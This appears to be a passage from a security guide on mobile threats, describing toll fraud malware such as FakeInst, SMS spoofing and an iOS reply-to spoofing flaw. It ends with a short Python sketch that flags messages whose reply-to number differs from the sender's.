Some of these reports include: http://www.symantec.com/security_response/publications/threatreport.jsp http://pewinternet.org/Commentary/2012/February/Pew-Internet-Mobile.aspx https://www.lookout.com/resources/reports/mobile-threat-report As stated recently in a Pew survey, more than fifty percent of U.S. mobile users are overly suspicious/concerned about their personal information, and have either refused to install apps for this reason or have uninstalled apps. In other words, the IC3 says: Use the same precautions on your mobile devices as you would on your computer when using the Internet. Toll fraud Since the 1970s and 1980s, hackers have been using a process known as phreaking . This trick provides a tone that tells the phone that a control mechanism is being used to manage long-distance calls. Today, the hackers are now using a technique known as toll fraud . It's a malware that sends premium-rate SMSs from your device, incurring charges on your phone bill. Some toll fraud malware may trick you into agreeing to murky Terms of Service, while others can send premium text messages without any noticeable indicators. This is also known as premium-rate SMS malware or premium service abuser . The following figure shows how toll fraud works, portrayed by Lookout Mobile Security: According to VentureBeat, malware developers are after money. The money is in the toll fraud malware. Here is an example from http://venturebeat.com/2012/09/06/toll-fraud-lookout-mobile/: Remember commercials that say, "Text 666666 to get a new ringtone everyday!"? The normal process includes: Customer texts the number, alerting a collector—working for the ringtone provider—that he/she wants to order daily ringtones. Through the collector, the ringtone provider sends a confirmation text message to the customer (or sometimes two depending on that country's regulations) to the customer. That customer approves the charges and starts getting ringtones. The customer is billed through the wireless carrier. The wireless carrier receives payment and sends out the ringtone payment to the provider. Now, let's look at the steps when your device is infected with the malware known as FakeInst : The end user downloads a malware application that sends out an SMS message to that same ringtone provider. As normal, the ringtone provider sends the confirmation message. In this case, instead of reaching the smartphone owner, the malware blocks this message and sends a fake confirmation message before the user ever knows. The malware now places itself between the wireless carrier and the ringtone provider. Pretending to be the collector, the malware extracts the money that was paid through the user's bill. FakeInst is known to get around antivirus software by identifying itself as new or unique software. Overall, Android devices are known to be impacted more by malware than iOS. One big reason for this is that Android devices can download applications from almost any location on the Internet. Apple limits its users to downloading applications from the Apple App store. SMS spoofing The third most common type of scam is called SMS spoofing . SMS spoofing allows a person to change the original mobile phone number or the name (sender ID) where the text message comes from. It is a fairly new technology that uses SMS on mobile phones. Spoofing can be used in both lawful and unlawful ways. Impersonating a company, another person, or a product is an illegal use of spoofing. 
Some nations have banned it due to concerns about the potential for fraud and abuse, while others may allow it. An example of how SMS spoofing is implemented is as follows: SMS spoofing occurs when the message sender's address information has been manipulated. This is done many times to impersonate a cell phone user who is roaming on a foreign network and sending messages to a home area network. Often, these messages are addressed to users who are outside the home network, which is essentially being "hijacked" to send messages to other networks. The impacts of this activity include the following: The customer's network can receive termination charges caused by the valid delivery of these "bad" messages to interlink partners. Customers may criticize about being spammed, or their message content may be sensitive. Interlink partners can cancel the home network unless a correction of these errors is implemented. Once this is done, the phone service may be unable to send messages to these networks. There is a great risk that these messages will look like real messages, and real users can be billed for invalid roaming messages that they did not send. There is a flaw within iPhone that allows SMS spoofing. It is vulnerable to text messaging spoofing, even with the latest beta version, iOS 6. The problem with iPhone is that when the sender specifies a reply-to number this way, the recipient doesn't see the original phone number in the text message. That means there's no way to know whether a text message has been spoofed or not. This opens up the user to other spoofing types of manipulation where the recipient thinks he/she is receiving a message from a trusted source. According to pod2g (http://www.pod2g.org/2012/08/never-trust-sms-ios-text-spoofing.html): In a good implementation of this feature, the receiver would see the original phone number and the reply-to one. On iPhone, when you see the message, it seems to come from the reply-to number, and you loose track of the origin.
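The point pod2g makes suggests a simple defensive check: if the receiving software exposed both the originating number and the reply-to number, a mismatch would be an immediate warning sign. The following Python sketch illustrates that check on a hypothetical, already-parsed message structure; the field names and phone numbers are assumptions made for the example, not an actual SMS API.

def looks_spoofed(message):
    # A message is suspicious when it carries a reply-to number that
    # differs from the number it claims to originate from
    originating = message.get("originating_address")
    reply_to = message.get("reply_to_address")
    return bool(reply_to) and reply_to != originating

incoming = {
    "originating_address": "+15555550100",   # hypothetical sender
    "reply_to_address": "+15555550199",      # hypothetical reply-to override
    "body": "Your account needs verification, reply to confirm.",
}

if looks_spoofed(incoming):
    print("Warning: reply-to differs from the originating number - possible spoofing.")
else:
    print("No reply-to mismatch detected.")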